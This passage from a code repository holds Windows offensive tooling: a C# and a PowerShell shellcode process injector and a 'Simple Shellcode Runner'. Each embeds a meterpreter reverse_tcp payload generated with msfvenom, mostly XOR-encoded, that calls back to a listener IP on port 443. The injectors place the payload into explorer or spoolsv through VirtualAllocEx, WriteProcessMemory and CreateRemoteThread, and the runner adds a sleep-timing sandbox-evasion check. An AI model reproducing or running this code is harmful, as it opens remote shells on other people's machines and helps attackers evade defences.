64 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
65 | byte[] buf = new byte[511] {
66 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
67 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
68 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
69 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
70 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
71 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
72 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
73 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
74 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
75 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
76 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
77 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
78 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
79 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
80 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
81 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
82 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
83 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
84 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
85 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
86 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
87 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
88 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
89 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
90 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
91 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
92 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
93 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
94 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
95 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
96 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
97 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
98 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
99 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
100 | 0x2f
101 | };
102 |
103 | int len = buf.Length;
104 |
105 | // Parse arguments, if given (process to inject)
106 | String procName = "";
107 | if (args.Length == 1)
108 | {
109 | procName = args[0];
110 | }
111 | else if (args.Length == 0) {
112 | // Inject based on elevation level
113 | if (IsElevated)
114 | {
115 | Console.WriteLine("Process is elevated.");
116 | procName = "spoolsv";
117 | }
118 | else
119 | {
120 | Console.WriteLine("Process is not elevated.");
121 | procName = "explorer";
122 | }
123 | }
124 | else
125 | {
126 | Console.WriteLine("Please give either one argument for a process to inject, e.g. \".\\ShInject.exe explorer\", or leave empty for auto-injection.");
127 | return;
128 | }
129 |
130 | Console.WriteLine($"Attempting to inject into {procName} process...");
131 |
132 | // Get process IDs
133 | Process[] expProc = Process.GetProcessesByName(procName);
134 |
135 | // If multiple processes exist, try to inject in all of them
136 | for (int i = 0; i < expProc.Length; i++)
137 | {
138 | int pid = expProc[i].Id;
139 |
140 | // Get a handle on the process
141 | IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid);
142 | if ((int)hProcess == 0)
143 | {
144 | Console.WriteLine($"Failed to get handle on PID {pid}.");
145 | continue;
146 | }
147 | Console.WriteLine($"Got handle {hProcess} on PID {pid}.");
148 |
149 | // Allocate memory in the remote process
150 | IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
151 | Console.WriteLine($"Allocated {len} bytes at address {expAddr} in remote process.");
152 |
153 | // Decode the payload
154 | for (int j = 0; j < buf.Length; j++)
155 | {
156 | buf[j] = (byte)((uint)buf[j] ^ 0xfa);
157 | }
158 |
159 | // Write the payload to the allocated bytes
160 | IntPtr bytesWritten;
161 | bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);
162 | Console.WriteLine($"Wrote {bytesWritten} payload bytes (result: {procMemResult}).");
163 |
164 | IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);
165 | Console.WriteLine($"Created remote thread at {threadAddr}. Check your listener!");
166 | break;
167 | }
168 | }
169 | }
170 | }
--------------------------------------------------------------------------------
/Shellcode Process Injector/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Shellcode Process Injector")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Shellcode Process Injector")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("e08baa9c-9d20-4c9a-8933-ec567f39f54c")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/Shellcode Process Injector.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}
8 | Exe
9 | Shellcode_Process_Injector
10 | Shellcode Process Injector
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/Shellcode Process Injector.ps1:
--------------------------------------------------------------------------------
1 | function LookupFunc {
2 | Param ($moduleName, $functionName)
3 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
4 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
5 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
6 | $tmp=@()
7 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
8 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
9 | @($moduleName)), $functionName))
10 | }
11 |
12 | function getDelegateType {
13 | Param (
14 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
15 | [Parameter(Position = 1)] [Type] $delType = [Void]
16 | )
17 | $type = [AppDomain]::CurrentDomain.
18 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
19 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
20 | DefineDynamicModule('InMemoryModule', $false).
21 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
22 | [System.MulticastDelegate])
23 | $type.
24 | DefineConstructor('RTSpecialName, HideBySig, Public',
25 | [System.Reflection.CallingConventions]::Standard, $func).
26 | SetImplementationFlags('Runtime, Managed')
27 | $type.
28 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
29 | SetImplementationFlags('Runtime, Managed')
30 | return $type.CreateType()
31 | }
32 |
33 | $procId = (Get-Process explorer).Id
34 |
35 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f ps1
36 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x51,0x48,0x8b,0x52,0x20,0x56,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x41,0x51,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x44,0x8b,0x40,0x20,0x8b,0x48,0x18,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x48,0x1,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
37 |
38 | # C#: IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, procId);
39 | $hProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),
40 | (getDelegateType @([UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke(0x001F0FFF, 0, $procId)
41 |
42 | # C#: IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
43 | $expAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAllocEx),
44 | (getDelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, [UInt32]$buf.Length, 0x3000, 0x40)
45 |
46 | # C#: bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);
47 | $procMemResult = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WriteProcessMemory),
48 | (getDelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr])([Bool]))).Invoke($hProcess, $expAddr, $buf, [Uint32]$buf.Length, [IntPtr]::Zero)
49 |
50 | # C#: IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);
51 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateRemoteThread),
52 | (getDelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, 0, $expAddr, 0, [IntPtr]::Zero)
53 |
54 | Write-Host "Injected! Check your listener!"
--------------------------------------------------------------------------------
/Shellcode Process Injector/Shellcode Process Injector.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Injector", "Shellcode Process Injector.csproj", "{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.ActiveCfg = Debug|x64
19 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.Build.0 = Debug|x64
20 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.ActiveCfg = Release|x64
21 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.Build.0 = Release|x64
22 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.ActiveCfg = Release|x64
23 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {04F2AB2E-4DA3-43DF-86FE-736580CBA9D4}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Program.cs:
--------------------------------------------------------------------------------
1 | using System.Runtime.InteropServices;
2 | using System;
3 |
4 | namespace rev
5 | {
6 | public class Program
7 | {
8 | public const uint EXECUTEREADWRITE = 0x40;
9 | public const uint COMMIT_RESERVE = 0x3000;
10 |
11 | [DllImport("kernel32.dll")]
12 | static extern void Sleep(uint dwMilliseconds);
13 |
14 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
15 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
16 |
17 | [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
18 | private unsafe static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, uint lpThreadId);
19 |
20 | [DllImport("kernel32.dll", SetLastError = true)]
21 | public static extern Int32 WaitForSingleObject(IntPtr Handle, Int32 Wait);
22 |
23 | public static void Main()
24 | {
25 |
26 | DateTime t1 = DateTime.Now;
27 | Sleep(10000);
28 | double deltaT = DateTime.Now.Subtract(t1).TotalSeconds;
29 | if (deltaT < 9.5)
30 | {
31 | return;
32 | }
33 |
34 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
35 | // XORed with key 0xfa
36 | byte[] buf = new byte[511] {
37 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
38 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
39 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
40 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
41 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
42 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
43 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
44 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
45 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
46 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
47 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
48 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
49 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
50 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
51 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
52 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
53 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
54 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
55 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
56 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
57 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
58 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
59 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
60 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
61 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
62 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
63 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
64 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
65 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
66 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
67 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
68 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
69 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
70 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
71 | 0x2f
72 | };
73 | int payloadSize = buf.Length;
74 | IntPtr payAddr = VirtualAlloc(IntPtr.Zero, payloadSize, COMMIT_RESERVE, EXECUTEREADWRITE);
75 | for (int i = 0; i < buf.Length; i++)
76 | {
77 | buf[i] = (byte)((uint)buf[i] ^ 0xfa);
78 | }
79 | Marshal.Copy(buf, 0, payAddr, payloadSize);
80 | IntPtr payThreadId = CreateThread(IntPtr.Zero, 0, payAddr, IntPtr.Zero, 0, 0);
81 | int waitResult = WaitForSingleObject(payThreadId, -1);
82 | }
83 | }
84 | }
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Simple Shellcode Runner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Simple Shellcode Runner")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
